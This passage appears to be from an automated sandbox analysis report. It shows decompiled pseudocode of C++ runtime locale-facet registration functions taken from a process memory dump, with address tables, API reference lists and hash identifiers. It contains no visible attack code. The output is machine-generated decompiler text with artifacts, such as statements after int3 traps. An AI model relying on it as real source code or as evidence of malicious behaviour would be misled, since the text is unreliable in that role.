                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t47;
                                                                                                				_t21 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t45 = _t21;
                                                                                                				if(_t21 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t45);
                                                                                                				} else {
                                                                                                					if(_t47 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						_t26 = E00F88C91(_t45, _t47, __eflags);
                                                                                                						_pop(_t40);
                                                                                                						__eflags = _t26 - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(_t47);
                                                                                                							_t48 = _t40;
                                                                                                							_t14 = _t48 + 0x10;
                                                                                                							 *_t14 =  *(_t48 + 0x10) & 0x00000000;
                                                                                                							__eflags =  *_t14;
                                                                                                							 *((intOrPtr*)(_t48 + 0x14)) = 7;
                                                                                                							 *_t48 = 0;
                                                                                                							E00F8D9F3(_v0);
                                                                                                							return _t48;
                                                                                                						} else {
                                                                                                							_t45 = _v16;
                                                                                                							_v16 = _t45;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t45);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t45 + 4))))();
                                                                                                							 *0xfd0b1c = _t45;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t45 = _t47;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}












                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a1b
                                                                                                0x00f87a20
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F879F1
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F879FB
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F87A4C
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F87A6C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: 768356a60947b64a1cd5d006979a92b9e30a9ea7e20ff3c0c279c38cb496a380
                                                                                                • Instruction ID: 8b4dcb6d489fdde9c0a933b08d90cb03e258ba19e002097c1bb2366bb0b32e79
                                                                                                • Opcode Fuzzy Hash: 768356a60947b64a1cd5d006979a92b9e30a9ea7e20ff3c0c279c38cb496a380
                                                                                                • Instruction Fuzzy Hash: DA01A13690421A9BCB04FBA4CC457FE7761AF84760F24400AE405A73A1DF3CDA02BB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E00F8216B(void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr* _t44;
                                                                                                				void* _t71;
                                                                                                				void* _t72;
                                                                                                				intOrPtr* _t105;
                                                                                                				intOrPtr* _t106;
                                                                                                				intOrPtr* _t118;
                                                                                                				intOrPtr* _t119;
                                                                                                				intOrPtr* _t121;
                                                                                                				intOrPtr* _t122;
                                                                                                				intOrPtr* _t123;
                                                                                                				void* _t129;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6(_t129 - 0x14, 0);
                                                                                                				_t121 =  *0xfd0944; // 0x0
                                                                                                				 *(_t129 - 4) =  *(_t129 - 4) & 0x00000000;
                                                                                                				 *((intOrPtr*)(_t129 - 0x10)) = _t121;
                                                                                                				_t44 = E00F78A40( *((intOrPtr*)(_t129 + 8)), E00F789D0());
                                                                                                				_t117 = _t44;
                                                                                                				if(_t44 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E(_t129 - 0x14);
                                                                                                					return E00FB388C(_t117);
                                                                                                				} else {
                                                                                                					if(_t121 == 0) {
                                                                                                						_push( *((intOrPtr*)(_t129 + 8)));
                                                                                                						_push(_t129 - 0x10);
                                                                                                						__eflags = E00F827F3(_t117, _t121, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t117, _t121);
                                                                                                							E00F856E6(_t129 - 0x14, 0);
                                                                                                							_t122 =  *0xfd0948; // 0x0
                                                                                                							 *(_t129 - 4) =  *(_t129 - 4) & 0x00000000;
                                                                                                							 *((intOrPtr*)(_t129 - 0x10)) = _t122;
                                                                                                							_t118 = E00F78A40( *((intOrPtr*)(_t129 + 8)), E00F789D0());
                                                                                                							__eflags = _t118;
                                                                                                							if(_t118 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E(_t129 - 0x14);
                                                                                                								return E00FB388C(_t118);
                                                                                                							} else {
                                                                                                								__eflags = _t122;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push( *((intOrPtr*)(_t129 + 8)));
                                                                                                									_push(_t129 - 0x10);
                                                                                                									__eflags = E00F8285B(_t118, _t122, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t118, _t122);
                                                                                                										E00F856E6(_t129 - 0x14, 0);
                                                                                                										_t123 =  *0xfd094c; // 0x0
                                                                                                										 *(_t129 - 4) =  *(_t129 - 4) & 0x00000000;
                                                                                                										 *((intOrPtr*)(_t129 - 0x10)) = _t123;
                                                                                                										_t119 = E00F78A40( *((intOrPtr*)(_t129 + 8)), E00F789D0());
                                                                                                										__eflags = _t119;
                                                                                                										if(_t119 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E(_t129 - 0x14);
                                                                                                											return E00FB388C(_t119);
                                                                                                										} else {
                                                                                                											__eflags = _t123;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push( *((intOrPtr*)(_t129 + 8)));
                                                                                                												_push(_t129 - 0x10);
                                                                                                												_t71 = E00F828C3(_t119, _t123, __eflags);
                                                                                                												_pop(_t105);
                                                                                                												__eflags = _t71 - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													_t72 = E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_t106 =  *_t105;
                                                                                                													__eflags = _t106;
                                                                                                													if(_t106 != 0) {
                                                                                                														_push(_t123);
                                                                                                														_t124 = _t106;
                                                                                                														E00F9BD1B( *((intOrPtr*)(_t106 + 8)));
                                                                                                														E00F9BD1B( *((intOrPtr*)(_t106 + 0x10)));
                                                                                                														return E00F9BD1B( *((intOrPtr*)(_t124 + 0x14)));
                                                                                                													} else {
                                                                                                														return _t72;
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t119 =  *((intOrPtr*)(_t129 - 0x10));
                                                                                                													 *((intOrPtr*)(_t129 - 0x10)) = _t119;
                                                                                                													 *(_t129 - 4) = 1;
                                                                                                													E00F85472(_t119);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t119 + 4))))();
                                                                                                													 *0xfd094c = _t119;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t119 = _t123;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t118 =  *((intOrPtr*)(_t129 - 0x10));
                                                                                                										 *((intOrPtr*)(_t129 - 0x10)) = _t118;
                                                                                                										 *(_t129 - 4) = 1;
                                                                                                										E00F85472(_t118);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 4))))();
                                                                                                										 *0xfd0948 = _t118;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t118 = _t122;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t117 =  *((intOrPtr*)(_t129 - 0x10));
                                                                                                							 *((intOrPtr*)(_t129 - 0x10)) = _t117;
                                                                                                							 *(_t129 - 4) = 1;
                                                                                                							E00F85472(_t117);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 4))))();
                                                                                                							 *0xfd0944 = _t117;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t117 = _t121;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}














                                                                                                0x00f8216b
                                                                                                0x00f82172
                                                                                                0x00f8217c
                                                                                                0x00f82181
                                                                                                0x00f8218c
                                                                                                0x00f82190
                                                                                                0x00f8219c
                                                                                                0x00f821a1
                                                                                                0x00f821a5
                                                                                                0x00f821ea
                                                                                                0x00f821ed
                                                                                                0x00f821f9
                                                                                                0x00f821a7
                                                                                                0x00f821a9
                                                                                                0x00f821af
                                                                                                0x00f821b5
                                                                                                0x00f821bd
                                                                                                0x00f821c0
                                                                                                0x00f821fa
                                                                                                0x00f821ff
                                                                                                0x00f82200
                                                                                                0x00f82207
                                                                                                0x00f82211
                                                                                                0x00f82216
                                                                                                0x00f82221
                                                                                                0x00f82225
                                                                                                0x00f82236
                                                                                                0x00f82238
                                                                                                0x00f8223a
                                                                                                0x00f8227f
                                                                                                0x00f82282
                                                                                                0x00f8228e
                                                                                                0x00f8223c
                                                                                                0x00f8223c
                                                                                                0x00f8223e
                                                                                                0x00f82244
                                                                                                0x00f8224a
                                                                                                0x00f82252
                                                                                                0x00f82255
                                                                                                0x00f8228f
                                                                                                0x00f82294
                                                                                                0x00f82295
                                                                                                0x00f8229c
                                                                                                0x00f822a6
                                                                                                0x00f822ab
                                                                                                0x00f822b6
                                                                                                0x00f822ba
                                                                                                0x00f822cb
                                                                                                0x00f822cd
                                                                                                0x00f822cf
                                                                                                0x00f82314
                                                                                                0x00f82317
                                                                                                0x00f82323
                                                                                                0x00f822d1
                                                                                                0x00f822d1
                                                                                                0x00f822d3
                                                                                                0x00f822d9
                                                                                                0x00f822df
                                                                                                0x00f822e0
                                                                                                0x00f822e6
                                                                                                0x00f822e7
                                                                                                0x00f822ea
                                                                                                0x00f82324
                                                                                                0x00f82329
                                                                                                0x00f8232a
                                                                                                0x00f8232c
                                                                                                0x00f8232e
                                                                                                0x00f8420b
                                                                                                0x00f8420c
                                                                                                0x00f84211
                                                                                                0x00f84219
                                                                                                0x00f8422a
                                                                                                0x00f82334
                                                                                                0x00f82334
                                                                                                0x00f82334
                                                                                                0x00f822ec
                                                                                                0x00f822ec
                                                                                                0x00f822ef
                                                                                                0x00f822f3
                                                                                                0x00f822f7
                                                                                                0x00f82304
                                                                                                0x00f8230c
                                                                                                0x00f8230e
                                                                                                0x00000000
                                                                                                0x00f8230e
                                                                                                0x00f822d5
                                                                                                0x00f822d5
                                                                                                0x00000000
                                                                                                0x00f822d5
                                                                                                0x00f822d3
                                                                                                0x00f82257
                                                                                                0x00f82257
                                                                                                0x00f8225a
                                                                                                0x00f8225e
                                                                                                0x00f82262
                                                                                                0x00f8226f
                                                                                                0x00f82277
                                                                                                0x00f82279
                                                                                                0x00000000
                                                                                                0x00f82279
                                                                                                0x00f82240
                                                                                                0x00f82240
                                                                                                0x00000000
                                                                                                0x00f82240
                                                                                                0x00f8223e
                                                                                                0x00f821c2
                                                                                                0x00f821c2
                                                                                                0x00f821c5
                                                                                                0x00f821c9
                                                                                                0x00f821cd
                                                                                                0x00f821da
                                                                                                0x00f821e2
                                                                                                0x00f821e4
                                                                                                0x00000000
                                                                                                0x00f821e4
                                                                                                0x00f821ab
                                                                                                0x00f821ab
                                                                                                0x00000000
                                                                                                0x00f821ab
                                                                                                0x00f821a9

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F82172
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F8217C
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F821CD
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F821ED
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: bf3ce5da579de5d3c972cb14b959b40632dbaa590e1df1de297ad07acb91a5de
                                                                                                • Instruction ID: 0e5172b1c4040981952eec4b37d8abdb506e2d392aeff814931461e6ebdb75ea
                                                                                                • Opcode Fuzzy Hash: bf3ce5da579de5d3c972cb14b959b40632dbaa590e1df1de297ad07acb91a5de
                                                                                                • Instruction Fuzzy Hash: CF01C4359015199BCB04FB64CC557FD77B1AF84760F24400AE51567392DF38AE02FB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F87955(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				signed int _t33;
                                                                                                				void* _t49;
                                                                                                				short* _t73;
                                                                                                				signed int _t82;
                                                                                                				signed int _t84;
                                                                                                				signed int _t85;
                                                                                                				short* _t86;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t84 =  *0xfd0ae8; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t84;
                                                                                                				_t33 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t81 = _t33;
                                                                                                				if(_t33 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t81);
                                                                                                				} else {
                                                                                                					if(_t84 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F88C25(_t81, _t84, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t81, _t84);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t85 =  *0xfd0b1c; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t85;
                                                                                                							_t82 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t82;
                                                                                                							if(_t82 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t82);
                                                                                                							} else {
                                                                                                								__eflags = _t85;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									_t49 = E00F88C91(_t82, _t85, __eflags);
                                                                                                									_pop(_t73);
                                                                                                									__eflags = _t49 - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(_t85);
                                                                                                										_t86 = _t73;
                                                                                                										_t26 = _t86 + 0x10;
                                                                                                										 *_t26 =  *(_t86 + 0x10) & 0x00000000;
                                                                                                										__eflags =  *_t26;
                                                                                                										 *((intOrPtr*)(_t86 + 0x14)) = 7;
                                                                                                										 *_t86 = 0;
                                                                                                										E00F8D9F3(_v4);
                                                                                                										return _t86;
                                                                                                									} else {
                                                                                                										_t82 = _v16;
                                                                                                										_v16 = _t82;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t82);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 4))))();
                                                                                                										 *0xfd0b1c = _t82;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t82 = _t85;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t81 = _v16;
                                                                                                							_v16 = _t81;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t81);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 4))))();
                                                                                                							 *0xfd0ae8 = _t81;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t81 = _t84;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}













                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f87986
                                                                                                0x00f8798b
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F8795C
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F87966
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F879B7
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F879D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: 719d77a72d3be2261b5648d99d14196fb793422ef69b9238d1bf0509ae5ad75f
                                                                                                • Instruction ID: 5c54d27ec80c16ee5c15eb8f3b488b48c4368f5df8b412c8b475712922de40d7
                                                                                                • Opcode Fuzzy Hash: 719d77a72d3be2261b5648d99d14196fb793422ef69b9238d1bf0509ae5ad75f
                                                                                                • Instruction Fuzzy Hash: F401A1369042299BCB04FB64CC457FE7771AF84760F64440AE8156B291DF78DE02EB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F872EE(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v48;
                                                                                                				signed int _t165;
                                                                                                				void* _t302;
                                                                                                				short* _t436;
                                                                                                				void* _t476;
                                                                                                				signed int _t479;
                                                                                                				signed int _t480;
                                                                                                				signed int _t481;
                                                                                                				signed int _t482;
                                                                                                				signed int _t483;
                                                                                                				signed int _t484;
                                                                                                				signed int _t485;
                                                                                                				signed int _t486;
                                                                                                				signed int _t487;
                                                                                                				signed int _t488;
                                                                                                				signed int _t489;
                                                                                                				signed int _t490;
                                                                                                				signed int _t492;
                                                                                                				signed int _t493;
                                                                                                				signed int _t494;
                                                                                                				signed int _t495;
                                                                                                				signed int _t496;
                                                                                                				signed int _t497;
                                                                                                				signed int _t498;
                                                                                                				signed int _t499;
                                                                                                				signed int _t500;
                                                                                                				signed int _t501;
                                                                                                				signed int _t502;
                                                                                                				signed int _t503;
                                                                                                				signed int _t504;
                                                                                                				short* _t505;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t492 =  *0xfd0ad8; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t492;
                                                                                                				_t165 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t478 = _t165;
                                                                                                				if(_t165 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t478);
                                                                                                				} else {
                                                                                                					if(_t492 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F88724(_t478, _t492, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t478, _t492);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t493 =  *0xfd0b0c; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t493;
                                                                                                							_t479 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t479;
                                                                                                							if(_t479 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t479);
                                                                                                							} else {
                                                                                                								__eflags = _t493;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F8878C(_t479, _t493, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t479, _t493);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t494 =  *0xfd0adc; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t494;
                                                                                                										_t480 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t480;
                                                                                                										if(_t480 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t480);
                                                                                                										} else {
                                                                                                											__eflags = _t494;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F887F4(_t480, _t494, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t480, _t494);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t495 =  *0xfd0b14; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t495;
                                                                                                													_t481 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t481;
                                                                                                													if(_t481 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t481);
                                                                                                													} else {
                                                                                                														__eflags = _t495;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F8885C(_t481, _t495, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t481, _t495);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t496 =  *0xfd0b10; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t496;
                                                                                                																_t482 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t482;
                                                                                                																if(_t482 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t482);
                                                                                                																} else {
                                                                                                																	__eflags = _t496;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		__eflags = E00F888E0(_t482, _t496, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t482, _t496);
                                                                                                																			E00F856E6( &_v20, 0);
                                                                                                																			_t497 =  *0xfd0ae4; // 0x0
                                                                                                																			_v4 = _v4 & 0x00000000;
                                                                                                																			_v16 = _t497;
                                                                                                																			_t483 = E00F78A40(_a8, E00F789D0());
                                                                                                																			__eflags = _t483;
                                                                                                																			if(_t483 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E( &_v20);
                                                                                                																				return E00FB388C(_t483);
                                                                                                																			} else {
                                                                                                																				__eflags = _t497;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push(_a8);
                                                                                                																					_push( &_v16);
                                                                                                																					__eflags = E00F88965(_t483, _t497, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t483, _t497);
                                                                                                																						E00F856E6( &_v20, 0);
                                                                                                																						_t498 =  *0xfd0ae0; // 0x0
                                                                                                																						_v4 = _v4 & 0x00000000;
                                                                                                																						_v16 = _t498;
